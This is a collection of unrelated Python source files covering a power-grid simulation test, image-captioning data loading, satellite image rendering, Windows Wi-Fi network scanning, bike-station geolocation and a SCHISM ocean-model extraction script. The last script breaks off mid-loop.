    """Assert that exactly `num_jobs` jobs finished successfully in
    `output_dir`."""
    summary = ResultsSummary(output_dir)
    results = summary.list_results()
    assert len(results) == num_jobs
    for job_result in results:
        assert job_result.status == "finished"
        assert job_result.return_code == 0
def test_recalculate_kva(cleanup):
    """Verify that PyDssSimulation._recalculate_kva rewrites a PVSystem
    definition line with the derived kVA and (optionally) pctPmpp."""
    defaults_cmd = f"{TRANSFORM_DEFAULTS} tests/data/smart-ds SnapshotImpactAnalysis -c {TRANSFORM_CONFIG}"
    transform_cmd = f"{TRANSFORM_JOBS} {TRANSFORM_CONFIG} -f -o {MODELS_DIR}"
    assert run_command(defaults_cmd) == 0
    assert run_command(transform_cmd) == 0
    # Build a simulation around the first available job.
    inputs = PyDssInputs(MODELS_DIR)
    key = inputs.list_keys()[0]
    config = PyDssConfiguration(inputs)
    job = config.inputs.get_job(key)
    config.add_job(job)
    simulation = PyDssSimulation.create(config.pydss_inputs,
                                        job,
                                        output="output")
    # The expected values below depend on these deployment settings.
    assert simulation._model.deployment.dc_ac_ratio == 1.15
    assert simulation._model.deployment.kva_to_kw_rating == 1.0
    irradiance_scaling_factor = 100
    # pctPmpp = irradiance_scaling_factor/DC-AC ratio
    # kVA = (Pmpp/DC-AC ratio)*(kVA_to_kW rating)
    for add_pct_pmpp in (True, False):
        simulation._add_pct_pmpp = add_pct_pmpp
        pmpp = 54.440229732964184
        line = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 phases=2 " \
            "kV=0.20784609690826525 kVA=59.884252706260604 " \
            f"Pmpp={pmpp} conn=wye irradiance=1 yearly=test"
        pct_pmpp = irradiance_scaling_factor / 1.15
        kva = pmpp / simulation._model.deployment.dc_ac_ratio * \
            simulation._model.deployment.kva_to_kw_rating
        expected = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 " \
            f"phases=2 kV=0.20784609690826525 kVA={kva} " \
            f"Pmpp={pmpp} conn=wye irradiance=1 yearly=test"
        if add_pct_pmpp:
            expected += f" pctPmpp={pct_pmpp}"
        actual = simulation._recalculate_kva(line)
        assert actual == expected + "\n"
        # Add pctPmpp as an existing bad value and ensure it gets fixed.
        line = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 phases=2 " \
            "kV=0.20784609690826525 kVA=59.884252706260604 " \
            f"Pmpp={pmpp} pctPmpp=99999 conn=wye irradiance=1 " \
            "yearly=test"
        expected = "New PVSystem.pv_123456 bus1=123456_xfmr.1.2 " \
            f"phases=2 kV=0.20784609690826525 kVA={kva} " \
            f"Pmpp={pmpp} pctPmpp={pct_pmpp} conn=wye irradiance=1 " \
            "yearly=test"
        actual = simulation._recalculate_kva(line)
        assert actual == expected + "\n"
|
<reponame>pskrunner14/descriptor
""" Data Utility Module for Image Captioning CRNN model. """
import os
import json
import collections
import multiprocessing as mp
import numpy as np
import cv2
from tqdm import tqdm
import torch
import torchvision as vision
import torchtext as text
from descriptor.models.cnn_encoder import get_cnn_encoder, encode
from keras.applications.inception_v3 import preprocess_input
# Tokens prepended to the GloVe vocabulary: unknown word, padding,
# start-of-sequence and end-of-sequence markers.
SPECIAL_TOKENS = ['<UNK>', '<PAD>', '<SOS>', '<EOS>']
def get_captions(json_file_path, filenames):
    """Return the caption lists for the given image filenames, in order.

    Args:
        json_file_path (string): Path to the COCO-style json file with
            'images' and 'annotations' sections.
        filenames (list): Filenames whose captions should be collected.
    """
    with open(json_file_path, "r") as fp:
        data = json.load(fp)
    # image id -> file name
    name_of = {entry['id']: entry['file_name'] for entry in data['images']}
    # file name -> every caption annotated for that image
    captions_of = collections.defaultdict(list)
    for annotation in data['annotations']:
        captions_of[name_of[annotation['image_id']]].append(annotation['caption'])
    # Plain dict so an unknown filename raises KeyError instead of
    # silently yielding an empty list.
    captions_of = dict(captions_of)
    return [captions_of[name] for name in filenames]
def load_vocab(name='6B', dim=300):
    """Load pretrained GloVe embeddings and prepend the special tokens.

    Args:
    -----
    name (str): name of the GloVe model.
    dim (int): dimension of the word vectors.

    Returns:
    --------
    torchtext.vocab.GloVe: GloVe model with the SPECIAL_TOKENS prepended
        (their vectors are zero-initialized).
    """
    vocab = text.vocab.GloVe(name=name, dim=dim)
    print(f'Loaded {len(vocab.itos)} {vocab.dim}-dimensional word vectors!')
    # Put the special tokens at the front of the index->string table and
    # rebuild the string->index mapping from scratch.
    vocab.itos = SPECIAL_TOKENS + vocab.itos
    del vocab.stoi
    vocab.stoi = {word: index for index, word in enumerate(vocab.itos)}
    print(f'Adding special tokens to the vocab: {SPECIAL_TOKENS}')
    # Zero vectors for the special tokens, stacked above the GloVe matrix.
    zeros = torch.zeros(len(SPECIAL_TOKENS), vocab.dim)
    vocab.vectors = torch.cat(tensors=(zeros, vocab.vectors))
    print(vocab.itos[:5])
    print(vocab.vectors.size())
    return vocab
def seq_to_tensor(sequence, word2idx, max_len=20):
    """Convert a caption string into a fixed-length LongTensor of ids.

    The text is lower-cased, split on spaces, mapped through `word2idx`
    (unknown words become <UNK>), wrapped in <SOS>/<EOS>, and padded with
    <PAD> so the result has exactly `max_len` entries.

    Args:
    -----
    sequence (str): the input text sequence.
    word2idx (dict): the mapping from word to index.
    max_len (int): length of the returned tensor.

    Returns:
    --------
    torch.Tensor: LongTensor of exactly `max_len` token ids.
    """
    unk = word2idx['<UNK>']
    ids = [word2idx['<SOS>']]
    for token in sequence.lower().split(' '):
        ids.append(word2idx.get(token, unk))
    # Leave room for <EOS> when the sequence is too long.
    if len(ids) >= max_len:
        ids = ids[:max_len - 1]
    ids.append(word2idx['<EOS>'])
    ids.extend([word2idx['<PAD>']] * (max_len - len(ids)))
    return torch.LongTensor(ids)
class Image2TensorDataset(torch.utils.data.Dataset):
    """Dataset of raw images prepared for the CNN encoder.

    Each item is a center-cropped, 299x299, Inception-preprocessed image
    tensor plus its file name (so encodings can be saved next to the
    source image).
    """
    def __init__(self, root_dir='data/train2014'):
        # Directory containing the .jpg images.
        self.__root_dir = root_dir
        self.__image_paths = list(filter(lambda x: x.endswith('.jpg'), os.listdir(root_dir)))
        self.__transform = vision.transforms.Compose([
            vision.transforms.ToTensor()
        ])
    def __len__(self):
        return len(self.__image_paths)
    def __getitem__(self, idx):
        file_name = self.__image_paths[idx]
        # NOTE(review): cv2.imread returns BGR; presumably acceptable for
        # the downstream encoder -- confirm channel order expectations.
        img = cv2.imread(f'{self.__root_dir}/{file_name}')
        img = image_center_crop(img)
        # 299x299 is the InceptionV3 input size.
        img = cv2.resize(img, (299, 299)).astype('float32')
        img = preprocess_input(img) # preprocess for model
        tensor = self.__transform(img)
        return {
            'image': tensor,
            'file_name': file_name
        }
class ImageTensor2CaptionDataset(torch.utils.data.Dataset):
    """Image to Caption mapping dataset.

    Pairs precomputed image-encoding tensors (.pt files alongside the
    .jpg images) with one randomly chosen caption per access.

    Args:
        word2idx (dict): word to index mapping vocab.
        max_len (int): maximum allowed length of a caption string.
        root_dir (string): directory with all the images.
        json_file (string): path to the json file with annotations.
    """
    def __init__(self, word2idx, max_len=20,
                 root_dir='data/train2014',
                 json_file='captions_train2014.json'):
        self._max_len = max_len
        self.__word2idx = word2idx
        self.__root_dir = root_dir
        self.__image_paths = list(filter(lambda x: x.endswith('.jpg'), os.listdir(root_dir)))
        self.__tensor_paths = list(filter(lambda x: x.endswith('.pt'), os.listdir(root_dir)))
        # Every image must already have been encoded to a .pt tensor.
        assert len(self.__image_paths) == len(self.__tensor_paths), 'conversion to tensors buggy'
        # Captions are aligned with __image_paths by index.
        self.__captions = get_captions(
            f'data/captions_train-val2014/annotations/{json_file}',
            self.__image_paths
        )
    def __len__(self):
        return len(self.__tensor_paths)
    def __getitem__(self, idx):
        tensor_name = self.__tensor_paths[idx]
        image_tensor = torch.load(f"{self.__root_dir}/{tensor_name}").cpu().detach()
        # Pick one of the image's captions at random.
        # NOTE(review): assumes every image has at least 5 captions
        # (COCO convention) -- fewer would raise IndexError; confirm.
        ridx = np.random.randint(5)
        caption = self.__captions[idx][ridx]
        caption = seq_to_tensor(caption, self.__word2idx, max_len=self._max_len)
        return {
            'image': image_tensor,
            'caption': caption
        }
def image_center_crop(img):
    """Crop an image to a centered square.

    The longer spatial dimension is trimmed symmetrically (for odd
    differences the extra pixel comes off the top/left side) so that
    height == width afterwards.

    Args:
    -----
        img (numpy.ndarray): image array of shape (H, W) or (H, W, C).

    Returns:
    --------
        numpy.ndarray: center-cropped square view of ``img``.
    """
    h, w = img.shape[0], img.shape[1]
    crop_top = 0
    crop_bottom = 0
    crop_left = 0
    crop_right = 0
    if h > w:
        diff = h - w
        crop_top = diff - diff // 2
        crop_bottom = diff // 2
    else:
        diff = w - h
        crop_left = diff - diff // 2
        crop_right = diff // 2
    # Slice only the first two axes: this also supports grayscale (2-D)
    # input, which the previous explicit third-axis slice rejected, and
    # is identical for (H, W, C) input.
    return img[crop_top: h - crop_bottom, crop_left: w - crop_right]
def encode_and_save(root_dir, cnn_encoder=None):
    """Encode every image under ``root_dir`` and save one tensor per image.

    Each ``<name>.jpg`` produces a ``<name>.pt`` file in the same
    directory containing the CNN embedding of that image.

    Args:
    -----
        root_dir (str): directory with the *.jpg images to encode.
        cnn_encoder: encoder model; built on demand when omitted.  (The
            previous signature used ``get_cnn_encoder()`` as a default
            argument, which constructed a model at import time even if
            this function was never called.)
    """
    if cnn_encoder is None:
        cnn_encoder = get_cnn_encoder()
    batch_size = 12
    dataset = Image2TensorDataset(root_dir=root_dir)
    dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
                                             shuffle=False, num_workers=8,
                                             pin_memory=True)
    # Ceiling division: one extra iteration for a final partial batch.
    total_iters = -(-len(dataset) // batch_size)
    for _, batch in tqdm(enumerate(dataloader), total=total_iters, leave=True,
                         desc=f'Encoding images into embeddings and saving tensors to files: {root_dir}'):
        images, file_names = batch['image'], batch['file_name']
        tensors = encode(images.cuda(), cnn_encoder=cnn_encoder).cpu().detach()
        for i, file_name in enumerate(file_names):
            torch.save(tensors[i], f"{root_dir}/{file_name.replace('.jpg', '.pt')}")
def main():
    """Build the CNN encoder once and encode the dataset directories."""
    cnn_encoder = get_cnn_encoder()
    if torch.cuda.is_available():
        cnn_encoder = cnn_encoder.cuda()
    paths = ['data/train2014', 'data/val2014']
    # NOTE(review): paths[1:] skips 'data/train2014' — presumably the train
    # split was already encoded in an earlier run; confirm this is intended.
    for path in paths[1:]:
        encode_and_save(path, cnn_encoder=cnn_encoder)


if __name__ == "__main__":
    main()
|
<reponame>jovi521/swsw
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
import sys
import os
import time
from fy4a import FY4A_AGRI_L1
def create_img(file_path, geo_range, save_dir):
    """Render channel 2 of an FY4A AGRI L1 file to a grayscale PNG.

    Args:
        file_path: path of the HDF/NC file to parse.
        geo_range: crop region and resolution as a comma-separated string:
            "min_lat, max_lat, min_lon, max_lon, step",
            e.g. "10, 54, 70, 140, 0.1".
        save_dir: base output directory; the final file is written to
            <save_dir><satellite>/<yyyyMMdd>/<CHANNEL>/<image name>.
    """
    # Derive the observation start time from the file name.
    filename = file_path.split('\\')[-1]
    start_time = filename.split('_')[-4]
    # Convert UTC to Beijing time (UTC+8).
    time_array = time.strptime(start_time, "%Y%m%d%H%M%S")
    time_stamp = int(time.mktime(time_array)) + 8 * 3600
    time_array = time.localtime(time_stamp)
    other_style_time = time.strftime('%Y%m%d%H%M%S', time_array)
    yyyyMMdd = other_style_time[0:8]
    # Satellite type and channel number used in the output path/name.
    satellite_type = 'FY4A'
    channel_number = 'Channel02'
    # Parse the file and extract the requested channel over the crop region.
    fy4a_agri_l1 = FY4A_AGRI_L1(file_path)
    fy4a_agri_l1.extract('Channel02', geo_range)
    channel12 = fy4a_agri_l1.channels['Channel02']
    # Set figure size and dpi.
    plt.figure(figsize=(10, 8), dpi=400)
    # Security fix: geo_range comes straight from sys.argv; eval() on it
    # would allow arbitrary code execution. Parse the numbers explicitly.
    lat_S, lat_N, lon_W, lon_E, step = (float(v) for v in geo_range.split(','))
    channel12 = np.flip(np.array(channel12), axis=0)
    # NOTE(review): the Basemap object is constructed but never used; kept
    # in case its side effects on the current figure are relied upon.
    Basemap(projection='merc', llcrnrlat=lat_S, urcrnrlat=lat_N,
            llcrnrlon=lon_W, urcrnrlon=lon_E, lat_ts=5, resolution='c')
    # NOTE(review): the plotting grid uses a hard-coded 0.1-degree step
    # rather than `step` from geo_range — confirm whether that is intended.
    x = np.arange(lon_W, lon_E + 0.1, 0.1)
    y = np.arange(lat_S, lat_N + 0.1, 0.1)
    xx, yy = np.meshgrid(x, y)
    plt.contourf(xx, yy, channel12, cmap='gray')
    # Strip axes/frame so only the raster remains.
    plt.axis('off')
    img_name = '{}{}{}{}{}{}'.format('C002', '_', other_style_time, '_', satellite_type, '.png')
    save_dir = '{}{}{}{}{}{}'.format(save_dir, satellite_type, '/', yyyyMMdd, '/', channel_number.upper())
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)
    save_path = '{}{}{}'.format(save_dir, '/', img_name)
    plt.savefig(save_path, transparent=True, bbox_inches='tight', pad_inches=0)
    # Release the figure so repeated calls do not accumulate memory.
    plt.close()
if __name__ == '__main__':
    # CLI usage: python <script> <file_path> <geo_range> <save_dir>
    file_path = sys.argv[1]
    geo_range = sys.argv[2]
    save_path = sys.argv[3]
    # Example invocations kept for reference:
    # file_path = 'D:/Z_SATE_C_BAWX_20201217062328_P_FY4A-_AGRI--_N_DISK_1047E_L2-_LSE-_MULT_NOM_20201217060000_20201217061459_012KM_V0001.NC'
    # color_dict = 'D:/color_dict.txt'
    # geo_range = '10,54,70,140,0.1'
    # save_path = 'D:/China.png'
    # file_path = 'D:\\Data\\Z_SATE_C_BAWX_20210130084157_P_FY4A-_AGRI--_N_REGC_1047E_L1-_FDI-_MULT_NOM_20210130083418_20210130083835_4000M_V0001.HDF'
    # geo_range = '10,54,70,140,0.1'
    # save_path = 'D:/Data/satellite_parse/'
    create_img(file_path,geo_range,save_path)
"""Allows user to collect data in a consistent manner."""
import re
import subprocess
from pylates import utils
class PlatformNetworkManager(object):
    """Base class for platforms to implement.

    These classes implement methods to interact with the network and
    collect data.
    """

    def __init__(self):
        # No shared state; subclasses set up their own resources.
        pass

    def gather_networks_info(self, method):
        # Interface stub: subclasses override this to collect network data
        # with the given `method`. Deliberately a no-op rather than raising.
        pass
class WindowsNetworkManager(PlatformNetworkManager):
    """Implement the Windows platform interaction with the network."""

    # netsh command listing visible wireless networks with BSSID detail.
    CMD_NETSH = ["netsh", "wlan", "show", "network", "mode=bssid"]

    def __init__(self):
        # Bug fix: `super(WindowsNetworkManager).__init__()` created an
        # *unbound* super object and never initialised the base class on
        # this instance; the two-argument form performs the intended call.
        super(WindowsNetworkManager, self).__init__()
        self.mac_address = self.get_interface_mac_address()

    def get_interface_mac_address(self):
        """Return the Wi-Fi interface MAC address using `getmac /v`."""
        result_raw = subprocess.check_output(['getmac', '/v']).decode('utf-8')
        return self._parse_getmac_v_output(result_raw)

    def gather_networks_info(self, method):
        """Collect visible networks with `method`, returned as dicts."""
        # Switch cmd below to change how data is collected
        network_list_raw = self._execute_gather_method(method)
        points_data = self._convert_command_output_to_dicts(
            method, network_list_raw)
        return points_data

    def _parse_getmac_v_output(self, getmac_output):
        """Extract the Wi-Fi adapter's MAC address from `getmac /v` output.

        Returns the last matching adapter's address, or '' when no Wi-Fi
        line is found.
        """
        lines = getmac_output.splitlines()
        wifi_mac_regex = re.compile(r'^Wi-Fi.*([a-fA-F0-9]{2}[:|\-]?){6}.*$')
        result = ''
        for line in lines:
            match = re.search(wifi_mac_regex, line)
            if match:
                result = utils.find_mac_address(line)
        return result

    def _execute_gather_method(self, method):
        """Use a specific method to gather data regarding the networks."""
        if method == self.CMD_NETSH:
            return subprocess.check_output(method).decode('utf-8')
        # Unknown methods fall through; callers currently only pass
        # CMD_NETSH, so make the None return explicit.
        return None

    def _convert_command_output_to_dicts(self, cmd, netsh_output):
        """Convert the 'netsh wlan show network "mode=bssid" output to dicts."""
        lines = netsh_output.splitlines()
        ssid_dicts = []
        if cmd == self.CMD_NETSH:
            ssid_reg = re.compile(r'^SSID \d* :.*$')
            ssid_locs = []
            ssid_infos = []
            # Divide SSIDs: each "SSID n :" header starts a new segment.
            for line_no in range(0, len(lines)):
                if ssid_reg.match(lines[line_no]):
                    ssid_locs.append(line_no)
                    if len(ssid_locs) > 1:
                        ssid_infos.append(lines[ssid_locs[-2]:ssid_locs[-1]])
            if len(ssid_locs) >= 1:
                ssid_infos.append(lines[ssid_locs[-1]:])
            for ssid_info in ssid_infos:
                ssid_dict = {'bssid': []}
                for line in ssid_info:
                    # A blank line terminates the current SSID section.
                    if not line:
                        break
                    k, v = line.split(':', 1)
                    k = k.strip()
                    v = v.strip()
                    if re.match(r'SSID \d+', k):
                        ssid_dict['ssid'] = v
                    elif k == 'Network type':
                        ssid_dict['network_type'] = v
                    elif k == 'Authentication':
                        ssid_dict['authentication'] = v
                    elif k == 'Encryption':
                        ssid_dict['encryption'] = v
                    elif re.match(r'BSSID \d+', k):
                        # Per-BSSID keys below attach to the latest entry.
                        ssid_dict['bssid'].append({'name': v})
                    elif k == 'Signal':
                        v = int(v.replace('%', ''))
                        ssid_dict['bssid'][-1]['signal'] = v
                    elif k == 'Radio type':
                        ssid_dict['bssid'][-1]['radio_type'] = v
                    elif k == 'Channel':
                        ssid_dict['bssid'][-1]['channel'] = v
                    elif k == 'Basic rates (Mbps)':
                        v = v.split(' ')
                        v = [float(x) for x in v]
                        ssid_dict['bssid'][-1]['basic_rates'] = v
                    elif k == 'Other rates (Mbps)':
                        v = v.split(' ')
                        v = [float(x) for x in v]
                        ssid_dict['bssid'][-1]['other_rates'] = v
                ssid_dicts.append(ssid_dict)
        return ssid_dicts
|
<gh_stars>1-10
"""Functions having to do with physical location
"""
import math
import requests
from divvy import config
def get_lat_lon(addr_string):
    """Convert an address to lat/lon

    Use the Google Maps Geocoding API to convert an
    address string (e.g. 123 North State Street)
    to a latitude and longitude. The Google API will
    also return a standardized address string.
    It's pretty good at spelling correction if the street
    name gets garbled by the speech-to-text engine.

    Parameters
    ----------
    addr_string: str
        String address, e.g. "123 North State Street, Chicago, IL".
        The zip code can help disambiguate, but generally
        isn't necessary. It's strongly advised to have
        either the city or the zip: otherwise, Google will
        guess what city you mean, often incorrectly.

    Returns
    -------
    (lat, lon, addr): (float, float, str)
        Latitude (as a float), longitude (as a float), and the
        standardized form of the input address

    Raises
    ------
    RuntimeError
        If the API responds with a non-200 status code.

    See Also
    --------
    https://developers.google.com/maps/documentation/geocoding/
    """
    # NOTE(review): '+' substitution is the only URL escaping applied here;
    # addresses containing '&' or '#' would corrupt the query string.
    addr_string = addr_string.replace(' ', '+')
    query = 'json?address=' + addr_string + '&key=' + config.maps_api_key
    resp = requests.get(config.maps_api + query)
    if resp.status_code != 200:
        # Bug fix: requests.Response has no `.status` attribute (and string
        # concatenation with an int would raise anyway); use status_code.
        raise RuntimeError('Error getting map coordinates: {}'.format(resp.status_code))
    # Parse the payload once instead of re-parsing it for every field.
    top_result = resp.json()['results'][0]
    lat = top_result['geometry']['location']['lat']
    lon = top_result['geometry']['location']['lng']
    addr = top_result['formatted_address']
    return lat, lon, addr
def distance(lat1, lon1, lat2, lon2):
    """Great-circle distance in meters between two points on Earth.

    Assumes a spherical Earth with radius equal to Earth's mean radius
    (6,371 km) and uses the haversine formula:

        a = sin^2(dphi/2) + cos(phi1) * cos(phi2) * sin^2(dlambda/2)
        c = 2 * atan2(sqrt(a), sqrt(1 - a))
        d = R * c

    where phi is latitude and lambda is longitude.

    Parameters
    ----------
    lat1, lon1 : float, float
        Origin latitude and longitude in decimal degrees
    lat2, lon2 : float, float
        Destination latitude and longitude in decimal degrees

    Returns
    -------
    float
        Distance between the two points in meters
    """
    earth_radius_m = 6371000
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    half_dphi = (phi2 - phi1) / 2
    half_dlambda = (math.radians(lon2) - math.radians(lon1)) / 2
    a = math.sin(half_dphi) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(half_dlambda) ** 2
    central_angle = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    return earth_radius_m * central_angle
def station_from_lat_lon(lat, lon, stations, n_nearest=3):
    """Find the nearest station(s) to a given location

    Parameters
    ----------
    lat : float or str
        Latitude
    lon : float or str
        Longitude
    stations : list of dict
        JSON following the Divvy "stationBeanList" schema.
        Each entry in the list must have
        "lat" and "lon" keys.
    n_nearest : int, optional
        Return this many stations, ordered from nearest to furthest

    Returns
    -------
    list of dict
        A list of `n_nearest` Divvy stations
    """
    lat, lon = float(lat), float(lon)
    # Only consider stations that are currently installed and renting.
    candidates = [(distance(lat, lon, st['lat'], st['lon']), st)
                  for st in stations
                  if (st['is_renting'] and st['is_installed'])]
    # Bug fix: sort on the distance only. Plain tuple sorting fell back to
    # comparing the station dicts when two distances tied, which raises
    # TypeError in Python 3 (dicts are unorderable).
    candidates.sort(key=lambda pair: pair[0])
    return [st for _, st in candidates[:n_nearest]]
|
<reponame>wzhengui/pylibs
#!/usr/bin/env python3
'''
Extract SCHISM variable values at (x,y,z) from station.bp.
1). work for both uncombined and combined SCHISM outputs
2). can extract multiple variables at the same time
3). can work in interactive or batch mode
4). output in ACSII or *npz format
'''
from pylib import *
import time
#-----------------------------------------------------------------------------
#Input
#-----------------------------------------------------------------------------
run='/sciclone/data10/wangzg/fabm_dev/RUN12' #run dir containing outputs
stacks=[1,146] #stacks of schout_*.nc
sname='RUN12/cosine' #name for results
svars=['elev','salt','temp','COS_1'] #SCHISM variables to be extracted
rvars=['elev','salt','temp','NO3'] #rename variable names
bpfile='/sciclone/data10/wangzg/fabm_dev/RUN12/station.bp' #file name of station.bp
icmb=0 #icmb=0: work on uncombined; icmb=1: work on combined schout_*.nc
ifs=1 #ifs=1: depth relative to surface; ifs=0: fixed depth (z coordinate)
fmt=0 #fmt=0: output as *.npz format; fmt=1: output as ASCII
#optional
grid='/sciclone/data10/wangzg/fabm_dev/RUN12/grid.npz' #saved grid info, to speed up; use hgrid.gr3 and vgrid.in if not exist
igather=1 #igather=1: save data on each rank,then combine; igather=0: use MPI
#resource request (per-cluster presets; uncomment the line for your cluster)
walltime='00:10:00'
qnode='x5672'; nnode=2; ppn=8 #hurricane, ppn=8
#qnode='bora'; nnode=2; ppn=20 #bora, ppn=20
#qnode='vortex'; nnode=2; ppn=12 #vortex, ppn=12
#qnode='femto'; nnode=2; ppn=12 #femto,ppn=32
#qnode='potomac'; nnode=4; ppn=8 #ches, ppn=12
#qnode='james'; nnode=5; ppn=20 #james, ppn=20
#qnode='skylake'; nnode=2; ppn=36 #viz3,skylake, ppn=36
#qnode='haswell'; nnode=2; ppn=2 #viz3,haswell, ppn=24,or 28
#qnode='frontera'; nnode=1; ppn=56 #frontera, ppn=56
qname='flex' #partition name (needed for frontera)
jname='Rd_{}'.format(os.path.basename(run)) #job name
ibatch=1; scrout='screen.out'; bdir=os.path.abspath(os.path.curdir)
#-----------------------------------------------------------------------------
#on front node: 1). submit jobs first (qsub), 2) running parallel jobs (mpirun)
#-----------------------------------------------------------------------------
if ibatch==0: os.environ['job_on_node']='1'; os.environ['bdir']=bdir #run locally
# When not yet on a compute node, build the scheduler command and resubmit
# this script through the queue, then exit the front-node process.
if os.getenv('job_on_node')==None:
    if os.getenv('param')==None: fmt=0; bcode=sys.argv[0]
    if os.getenv('param')!=None: fmt=1; bdir,bcode=os.getenv('param').split(); os.chdir(bdir)
    scode=get_hpc_command(bcode,bdir,jname,qnode,nnode,ppn,walltime,scrout,fmt=fmt,qname=qname)
    print(scode); os.system(scode); os._exit(0)
#-----------------------------------------------------------------------------
#on computation node
#-----------------------------------------------------------------------------
bdir=os.getenv('bdir'); os.chdir(bdir) #enter working dir
comm=MPI.COMM_WORLD; nproc=comm.Get_size(); myrank=comm.Get_rank()
if myrank==0: t0=time.time()
#-----------------------------------------------------------------------------
#do MPI work on each core
#-----------------------------------------------------------------------------
# Cap the effective worker count at the number of stacks (at least 1 rank).
nproc=max(min(nproc,int(diff(stacks))),1)
if myrank==0:
    # Make sure the output directory for `sname` exists before ranks write.
    sdir=os.path.dirname(sname)
    if (not os.path.exists(sdir)) and sdir!='': os.mkdir(sdir)
#-----------------------------------------------------------------------------
#compute grid and bpfile information
#-----------------------------------------------------------------------------
#read grid information (cached *.npz if available, else parse grid files)
t00=time.time()
if os.path.exists(grid):
    gd=loadz(grid).hgrid; vd=loadz(grid).vgrid
else:
    gd=read_schism_hgrid('{}/hgrid.gr3'.format(run))
    vd=read_schism_vgrid('{}/vgrid.in'.format(run))
#compute area coordinate for stations (parent element, nodes, weights)
bp=read_schism_bpfile(bpfile)
bp.ie,bp.ip,bp.acor=gd.compute_acor(c_[bp.x,bp.y]); #bp.ne,bp.np=gd.ne,gd.np
bp.dp=gd.dp[bp.ip]; bp.dp0=(bp.dp*bp.acor).sum(axis=1)
if vd.ivcor==1: bp.sigma=vd.sigma[bp.ip]; bp.kbp=vd.kbp[bp.ip]; vd.sigma=None
#check pts inside grid (ie==-1 means no parent element was found)
sindn=nonzero(bp.ie==-1)[0]
if len(sindn)!=0: sys.exit('pts outside of domain: {}'.format(c_[bp.x[sindn],bp.y[sindn]]))
dt00=time.time()-t00; print('finish reading grid info: time={:0.2f}s, myrank={}'.format(dt00,myrank)); sys.stdout.flush()
#read subdomain info (uncombined outputs: map global indices to each rank's local ones)
if icmb==0:
    t00=time.time()
    subs=gd.read_prop('{}/outputs/global_to_local.prop'.format(run)).astype('int')[bp.ie]
    isub=unique(subs); sbps=[]; sindes=[]
    for i, isubi in enumerate(isub):
        sinde=nonzero(subs==isubi)[0] #elem index of stations
        #build the iegl and ipgl (global-to-local element/node index maps)
        T=read_schism_local_to_global('{}/outputs/local_to_global_{}'.format(run,srank(isubi,run)))
        iegl=dict(zip(T.ielg,arange(T.ne))); ipgl=dict(zip(T.iplg,arange(T.np)))
        #compute subdomain ie,ip and acor,dp,z,sigma,kbp
        sbp=zdata(); #sbp.ne,sbp.np=T.ne,T.np
        sbp.ie=array([iegl[k] for k in bp.ie[sinde]])
        sbp.ip=array([[ipgl[k] for k in n ] for n in bp.ip[sinde]])
        sbp.acor=bp.acor[sinde]; sbp.dp=bp.dp[sinde]; sbp.z=bp.z[sinde]; sbp.nsta=len(sinde)
        if vd.ivcor==1: sbp.sigma=bp.sigma[sinde]; sbp.kbp=bp.kbp[sinde]
        sbps.append(sbp); sindes.extend(sinde)
    sinds=argsort(array(sindes)) #indices to sort station order
    dt00=time.time()-t00; print('finish reading subdomain info: time={:0.2f}s, myrank={}'.format(dt00,myrank)); sys.stdout.flush()
else:
    isub=[None]; sbps=[bp]; sinds=arange(bp.nsta)
#-----------------------------------------------------------------------------
#extract data on each processor
#-----------------------------------------------------------------------------
#distribute jobs: round-robin assignment of stacks across MPI ranks
istacks=[i for i in arange(stacks[0],stacks[1]+1) if i%nproc==myrank]
#initialize data capsule (one list attribute per extracted variable)
S=zdata(); S.time=[]; #S.bp=bp
for i in svars: exec('S.{}=[]'.format(i))
#extract (x,y,z) value for each stack and each subdomain
for n,istack in enumerate(istacks):
    t00=time.time(); Si=zdata()
    for m in svars: exec('Si.{}=[]'.format(m))
    for m,isubi in enumerate(isub):
        #open schout_*.nc
        if icmb==0: fname='{}/outputs/schout_{}_{}.nc'.format(run,srank(isubi,run),istack)
        if icmb==1: fname='{}/outputs/schout_{}.nc'.format(run,istack)
        if (not os.path.exists(fname)) and icmb==0: sys.exit('not exist: {}'.format(fname))
        C=ReadNC(fname,1); sbp=sbps[m]
        #read time (seconds -> days); only append once per stack (m==0)
        mti=array(C.variables['time'][:])/86400; nt=len(mti);
        if m==0: S.time.extend(mti)
        #extract elevation -> compute zcor -> vertical interpolate
        eis=[]; k1s=[]; k2s=[]; rats=[]
        for i in arange(nt):
            eii=array(C.variables['elev'][i][sbp.ip]) if ('elev' in C.variables) else 0*sbp.dp
            ei=(eii*sbp.acor).sum(axis=1); eis.append(ei)
            if len(svars)==1 and svars[0]=='elev': continue
            #compute zcor at each of the 3 parent-element nodes
            zii=[]; kbpii=[]
            for k in arange(3):
                if vd.ivcor==1: ziii=vd.compute_zcor(sbp.dp[:,k],eii[:,k],sigma=sbp.sigma[:,k,:],kbp=sbp.kbp[:,k],method=1)
                if vd.ivcor==2: ziii,kbpiii=vd.compute_zcor(sbp.dp[:,k],eii[:,k],method=1,ifix=1); kbpii.append(kbpiii)
                zii.append(ziii)
            zi=(array(zii)*sbp.acor.T[...,None]).sum(axis=0).T
            if vd.ivcor==2: sbp.kbp=array(kbpii).T.astype('int')
            #station depth (ifs==1: measured downward from the free surface)
            mzi=sbp.z.copy()
            if ifs==1: mzi=-mzi+ei
            #interpolation in the vertical: bracket mzi between layers k1,k2
            k1=ones(sbp.nsta)*nan; k2=ones(sbp.nsta)*nan; rat=ones(sbp.nsta)*nan
            fp=mzi<=zi[0]; k1[fp]=0; k2[fp]=0; rat[fp]=0 #bottom
            fp=mzi>=zi[-1]; k1[fp]=(vd.nvrt-1); k2[fp]=(vd.nvrt-1); rat[fp]=1 #surface
            for k in arange(vd.nvrt-1):
                fp=(mzi>=zi[k])*(mzi<zi[k+1])
                k1[fp]=k; k2[fp]=k+1
                rat[fp]=(mzi[fp]-zi[k][fp])/(zi[k+1][fp]-zi[k][fp])
            if sum(isnan(r_[k1,k2,rat]))!=0: sys.exit('check vertical interpolation')
            k1s.append(k1); k2s.append(k2); rats.append(rat)
        eis=array(eis); k1s=array(k1s).astype('int'); k2s=array(k2s).astype('int'); rats=array(rats)
        if len(svars)==1 and svars[0]=='elev': Si.elev.extend(array(eis).T); continue
